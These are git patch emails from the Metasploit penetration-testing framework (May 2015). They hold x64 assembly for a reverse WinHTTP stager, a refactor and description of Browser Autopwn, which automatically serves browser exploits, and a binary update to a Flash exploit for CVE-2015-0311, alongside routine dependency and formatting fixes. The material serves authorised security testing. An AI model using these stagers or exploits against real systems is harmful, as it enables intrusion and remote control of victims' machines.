+
+        ; we don't care about the "auto detect" flag, as it doesn't seem to
+        ; impact us at all.
+
+        ; check if there's an auto configuration URL
+        mov rax, [rdi+8]
+        test eax, eax
+        jz ie_proxy_manual
+
+        ; set up the autoproxy structure on the stack and get it ready to pass
+        ; into the target function
+        mov rcx, rbx
+        inc rcx
+        shl rcx, 32
+        push rcx                      ; dwReserved (0) and fAutoLoginIfChallenged
+        push rbx                      ; lpvReserved (NULL)
+        push rax                      ; lpszAutoConfigUrl
+        mov rax, #{ie_proxy_flags | ie_proxy_autodect << 32} ; dwAutoDetectFlags and dwFlags
+        push rax
+        mov r8, rsp                   ; put the structure in the parameter list
+
+        ; prepare the proxy info buffer, 32 bytes required
+        sub rsp, 32
+        mov rdi, rsp                  ; we'll need a pointer to this later
+        mov r9, rdi                   ; pass it as the 4th parameter
+
+        ; rest of the parameters
+        mov rcx, r12                  ; hSession
+        mov rdx, r13                  ; lpcwszUrl
+
+        ; finally make the call
+        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} ; WinHttpGetProxyForUrl
+        call rbp
+
+        test eax, eax                 ; skip the rest of the proxy stuff if the call failed
+        jz ie_proxy_setup_finish
+        jmp set_ie_proxy              ; rdi points to the filled out proxy structure
+
+      ie_proxy_manual:
+        mov rax, [rdi+16]             ; check for the manual proxy
+        test eax, eax
+        jz ie_proxy_setup_finish
+
+        add rdi, 8
+        push 3
+        pop rax
+        mov [rdi], rax                ; set dwAccessType (3=WINHTTP_ACCESS_TYPE_NAMED_PROXY)
+
+        ; fallthrough to set the ie proxy
+
+      set_ie_proxy:
+        ; we assume that rdi is going to point to the proxy options
+        mov r8, rdi                   ; lpBuffer (proxy options)
+        push 24
+        pop r9                        ; dwBufferLength (size of proxy options)
+        mov rcx, rsi                  ; hConnection (connection handle)
+        push 38
+        pop rdx                       ; (38=WINHTTP_OPTION_PROXY)
+        mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption
+        call rbp
+
+      ie_proxy_setup_finish:
+      ^
+    end
+
     if retry_count > 1
       asm << %Q^
         push #{retry_count}

From 307dcd09dd89e63377717bb3acad48dddb52ebc3 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 25 May 2015 20:12:20 +1000
Subject: [PATCH 0182/1013] Update payload cache sizes again

---
 lib/msf/core/payload/windows/reverse_winhttp.rb          | 2 +-
 lib/msf/core/payload/windows/x64/reverse_winhttp.rb      | 2 +-
 modules/payloads/stagers/windows/reverse_winhttp.rb      | 2 +-
 modules/payloads/stagers/windows/reverse_winhttps.rb     | 2 +-
 modules/payloads/stagers/windows/x64/reverse_winhttp.rb  | 2 +-
 modules/payloads/stagers/windows/x64/reverse_winhttps.rb | 2 +-
 6 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb
index f2988b1100..f6a18fd0fa 100644
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -31,7 +31,7 @@ module Payload::Windows::ReverseWinHttp
   def generate(opts={})
     conf = {
       ssl:         opts[:ssl] || false,
-      host:        datastore['LHOST'],
+      host:        datastore['LHOST'] || '127.127.127.127',
       port:        datastore['LPORT'],
       uri:         generate_small_uri,
       retry_count: datastore['StagerRetryCount'],
diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
index a98b36dd7c..8667f8e5fc 100644
--- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
@@ -32,7 +32,7 @@ module Payload::Windows::ReverseWinHttp_x64
   def generate(opts={})
     conf = {
       ssl:         opts[:ssl] || false,
-      host:        datastore['LHOST'],
+      host:        datastore['LHOST'] || '127.127.127.127',
       port:        datastore['LPORT'],
       uri:         generate_small_uri,
       retry_count: datastore['StagerRetryCount'],
diff --git a/modules/payloads/stagers/windows/reverse_winhttp.rb b/modules/payloads/stagers/windows/reverse_winhttp.rb
index 4242ac692a..874c43ba8e 100644
--- a/modules/payloads/stagers/windows/reverse_winhttp.rb
+++ b/modules/payloads/stagers/windows/reverse_winhttp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/reverse_winhttp'
 
 module Metasploit4
 
-  CachedSize = 327
+  CachedSize = 357
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/reverse_winhttps.rb b/modules/payloads/stagers/windows/reverse_winhttps.rb
index 18d76fc612..2fc30a16ae 100644
--- a/modules/payloads/stagers/windows/reverse_winhttps.rb
+++ b/modules/payloads/stagers/windows/reverse_winhttps.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/reverse_winhttps'
 
 module Metasploit4
 
-  CachedSize = 347
+  CachedSize = 377
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
index 2aa70a863d..d5bfbfac8e 100644
--- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttp'
 
 module Metasploit4
 
-  CachedSize = 510
+  CachedSize = 540
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
index cdd9b381f0..09ba8aa6da 100644
--- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttps'
 
 module Metasploit4
 
-  CachedSize = 541
+  CachedSize = 571
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows

From 3d5248f023fc1edfdb54835e7ea3e0286d7b5aec Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 25 May 2015 11:46:18 -0500
Subject: [PATCH 0183/1013] This is better

---
 lib/msf/core/exploit/browserautopwnv2.rb | 86 ++++++++++++------------
 1 file changed, 42 insertions(+), 44 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index c5b8ec8cda..0fb2ef7efe 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -373,6 +373,33 @@ module Msf
     end
 
 
+    def is_payload_platform_compatible?(m, payload_platform)
+      begin
+        platform_obj = Msf::Module::Platform.find_platform(payload_platform)
+      rescue ArgumentError
+        false
+      end
+
+      return true if platform_obj && m.platform.platforms.include?(platform_obj)
+
+      false
+    end
+
+
+    def is_payload_compatible?(m, payload_name)
+      m.compatible_payloads.each do |k|
+        return true if k[0] == payload_name
+      end
+
+      false
+    end
+
+
+    def is_multi_platform_exploit?(m)
+      m.fullname.include?('multi/')
+    end
+
+
     # Returns the selected payload. This method will choose a compatible payload based on the
     # default list.
     #
@@ -382,54 +409,21 @@ module Msf
       compatible_payloads = []
 
       DEFAULT_PAYLOADS.each_pair do |platform, info|
-        payload_choice = {}
-        payload_name  = get_selected_payload_name(platform)
-        payload_lport = get_selected_payload_lport(platform)
+        payload_choice = {
+          :payload_name => get_selected_payload_name(platform),
+          :payload_lport => get_selected_payload_lport(platform)
+        }
 
-        # If the exploit has a platform, we don't have to call the expensive compatible_payloads method
-        begin
-          platform_obj = Msf::Module::Platform.find_platform(platform)
-        rescue ArgumentError
-          platform_obj = nil
-          # No platform obj found
-        end
-
-        if !m.fullname.include?('multi/') && platform_obj && m.platform.platforms.include?(platform_obj)
-            payload_choice = {
-              :payload_name => payload_name,
-              :payload_lport => payload_lport
-            }
-
-            # Module's compatible payloads.
-            compatible_payloads << payload_choice
-
-            # Track all compatible payloads.
-            @wanted_payloads << payload_choice
-
-            return compatible_payloads
-        end
-
-        # Either it's a multi-platform module, or there's no platform information.
-        m.compatible_payloads.each do |k|
-          if k[0] == payload_name
-            payload_choice = {
-              :payload_name => payload_name,
-              :payload_lport => payload_lport
-            }
-
-            # Module's compatible payloads.
-            compatible_payloads << payload_choice
-
-            # Track all compatible payloads.
-            @wanted_payloads << payload_choice
-
-            # If the module isn't multiple, we assume there is only one payload that needs to be set,
-            # therefore no need to continue.
-            break if !m.fullname.include?('multi/')
-          end
+        if !is_multi_platform_exploit?(m) && !m.platform.platforms.empty? && is_payload_platform_compatible?(m, platform)
+          compatible_payloads << payload_choice
+          break
+        elsif is_payload_compatible?(m, payload_choice[:payload_name])
+          compatible_payloads << payload_choice
         end
       end
 
+      @wanted_payloads.concat(compatible_payloads)
+
       compatible_payloads
     end
 
@@ -738,6 +732,10 @@ module Msf
         else
           return datastore['Content']
         end
+      elsif exploit_list.empty?
+        print_status("No suitable exploits to send.")
+        send_not_found(cli)
+        return ''
       end
 
 

From 31027411576c6b8a1212d95a821095b3582348ca Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 25 May 2015 11:54:58 -0500
Subject: [PATCH 0184/1013] Don't need print_line

---
 lib/msf/core/exploit/browserautopwnv2.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 0fb2ef7efe..8cde1330d2 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -472,7 +472,6 @@ module Msf
       start_payload_listeners
 
       t2 = Time.now
-      print_line
       print_status("Time spent: #{(t2-t1).inspect}")
     end
 

From 43f505b462c4516c773d4ac9145ad8dea6751dcc Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Mon, 25 May 2015 19:31:50 +0200
Subject: [PATCH 0185/1013] fix contact details

---
 modules/exploits/linux/upnp/miniupnpd_soap_bof.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
index 950f3f4835..fe94b76a68 100644
--- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
+++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'hdm', # Vulnerability discovery
           'Dejan Lukan', # Metasploit module, debian target
           'Onur ALANBEL', # Expliot for Airties target
-          'm-1-k-3' # Metasploit module, Airties target
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module, Airties target
         ],
       'License'        => MSF_LICENSE,
       'DefaultOptions' => { 'EXITFUNC' => 'process', },

From abd4ab548d44580dc22a6cfee6a61bebf9dacd3c Mon Sep 17 00:00:00 2001
From: benpturner <benpturner@yahoo.com>
Date: Mon, 25 May 2015 20:10:29 +0100
Subject: [PATCH 0186/1013] Edit spaces within the powershell session command

---
 lib/msf/base/sessions/powershell.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/base/sessions/powershell.rb b/lib/msf/base/sessions/powershell.rb
index f2d129f5cc..6451af384d 100644
--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -58,8 +58,8 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
       buff << res
       if buff.match(/#{endm}/)
         # if you see the end marker, read the buffer from the start marker to the end and then display back to screen
-        buff = buff.split(/#{strm}/)[-1]
-        buff.gsub!(/PS .*>/, '')
+        buff = buff.split(/#{strm}\r\n/)[-1]
+        buff.gsub!(/\nPS .*>/, '')
         buff.gsub!(/#{endm}/, '')
         return buff
       end

From a0e0e3d360cf36383553c2663a9527d2effd9397 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 25 May 2015 17:24:41 -0500
Subject: [PATCH 0187/1013] Description

---
 modules/exploits/multi/browser/autopwn.rb | 40 +++++++++++++++++++++--
 1 file changed, 37 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 343e544415..6302cd4d2f 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -12,9 +12,40 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "HTTP Client Automatic Exploiter",
+      'Name'           => "HTTP Client Automatic Exploiter (Browser Autopwn)",
       'Description'    => %q{
-        Place holder
+        This module will automatically serve browser exploits. Here are the options you can
+        configure:
+
+        The Include option allows you to specify the kind of exploits to be loaded. For example,
+        if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.
+
+        The Exclude option will ignore exploits. For example, if you don't want any Adobe Flash
+        exploits, you can set this. Also note that the Exclude option will always be evaludated
+        after the Include option.
+
+        The MaxExploits option specifies the max number of exploits to load by Browser Autopwn.
+        By default, 20 will be loaded. But note that the client will probably not be vulnerable
+        to all 20 of them, so only some will actually be served to the client.
+
+        The Content option allows you to provide a basic webpage. This is what the user behind
+        the vulnerable browser will see. You can simply set a string, or you can do the file://
+        syntax to load an HTML file. Note this option might break exploits so try to keep it
+        as simple as possible.
+
+        The WhiteList option can be used to avoid visitors that are outside the scope of your
+        pentest engagement. IPs that are not on the list will not be attacked.
+
+        The MaxSessions option is used to limit how many sessions Browser Autopwn is allowed to
+        get. The default -1 means unlimited. Combining this with other options such as RealList
+        and Custom404, you can get information about which visitors (IPs) clicked on your malicious
+        link, what exploits they might be vulnerable to, redirect them to your own internal
+        training website without actually attacking them.
+
+        The RealList is an option that will list what exploits the client might be vulnerable to
+        based on basic browser information. If possible, you can run the exploits for validation.
+
+        For more information about Browser Autopwn, please see the reference link.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'sinn3r' ],
@@ -23,6 +54,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Feb 5 2014",
       'Targets'        => [ [ 'Automatic', {} ] ],
+      'References'     =>
+        [
+          [ 'URL', 'https://github.com/rapid7/metasploit-framework/wiki' ]
+        ],
       'DefaultTarget'  => 0))
 
 
@@ -30,7 +65,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptEnum.new('Action', [false, 'Action', 'WebServer', ['WebServer','DefangedDetection'], 'WebServer']),
         OptRegexp.new('Include', [false, 'Pattern search to include specific modules']),
         OptRegexp.new('Exclude', [false, 'Pattern search to exclude specific modules']),
         OptInt.new('MaxExploits', [false, 'Number of browser exploits to load', 20]),

From 2934dcbf3569d628a1f6ad51c29b5d46fc0f2576 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 26 May 2015 10:40:27 -0500
Subject: [PATCH 0188/1013] Bump Gemfile.lock w/Recog/MDM

---
 Gemfile.lock | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 2319aa9af3..5dd2299b0e 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -15,7 +15,7 @@ PATH
       packetfu (= 1.1.9)
       railties
       rb-readline-r7
-      recog (~> 1.0)
+      recog (~> 2.0)
       robots
       rubyzip (~> 1.1)
       sqlite3
@@ -24,7 +24,7 @@ PATH
       activerecord (>= 4.0.9, < 4.1.0)
       metasploit-credential (~> 1.0)
       metasploit-framework (= 4.11.0.pre.dev)
-      metasploit_data_models (~> 1.0)
+      metasploit_data_models (~> 1.2)
       pg (>= 0.11)
     metasploit-framework-pcap (4.11.0.pre.dev)
       metasploit-framework (= 4.11.0.pre.dev)
@@ -124,7 +124,7 @@ GEM
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
     metasploit-payloads (0.0.7)
-    metasploit_data_models (1.0.1)
+    metasploit_data_models (1.2.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       arel-helpers
@@ -133,12 +133,12 @@ GEM
       pg
       postgres_ext
       railties (>= 4.0.9, < 4.1.0)
-      recog (~> 1.0)
+      recog (~> 2.0)
     method_source (0.8.2)
     mime-types (2.4.3)
     mini_portile (0.6.2)
     minitest (4.7.5)
-    msgpack (0.5.11)
+    msgpack (0.6.0)
     multi_json (1.11.0)
     multi_test (0.1.2)
     network_interface (0.0.1)
@@ -146,7 +146,7 @@ GEM
       mini_portile (~> 0.6.0)
     packetfu (1.1.9)
     pcaprub (0.12.0)
-    pg (0.18.1)
+    pg (0.18.2)
     pg_array_parser (0.0.9)
     postgres_ext (2.4.1)
       activerecord (>= 4.0.0)
@@ -156,7 +156,7 @@ GEM
       coderay (~> 1.1.0)
       method_source (~> 0.8.1)
       slop (~> 3.4)
-    rack (1.5.2)
+    rack (1.5.3)
     rack-test (0.6.3)
       rack (>= 1.0)
     rails (4.0.13)
@@ -174,7 +174,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (10.4.2)
     rb-readline-r7 (0.5.2.0)
-    recog (1.0.29)
+    recog (2.0.2)
       nokogiri
     redcarpet (3.2.3)
     rkelly-remix (0.0.6)
@@ -222,7 +222,7 @@ GEM
     thread_safe (0.3.5)
     tilt (1.4.1)
     timecop (0.7.3)
-    tzinfo (0.3.43)
+    tzinfo (0.3.44)
     xpath (2.0.0)
       nokogiri (~> 1.3)
     yard (0.8.7.6)

From 91357ee45bc8facaec58eb8260919264ed2d427e Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 13:47:33 -0500
Subject: [PATCH 0189/1013] Improve reliability

---
 data/exploits/CVE-2015-0311/msf.swf | Bin 20328 -> 20302 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf
index e94528b7155ff2f61a0d53d3284b5c663976b644..0782407696358578179c54091bf480117265c06f 100644
GIT binary patch
delta 20178
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
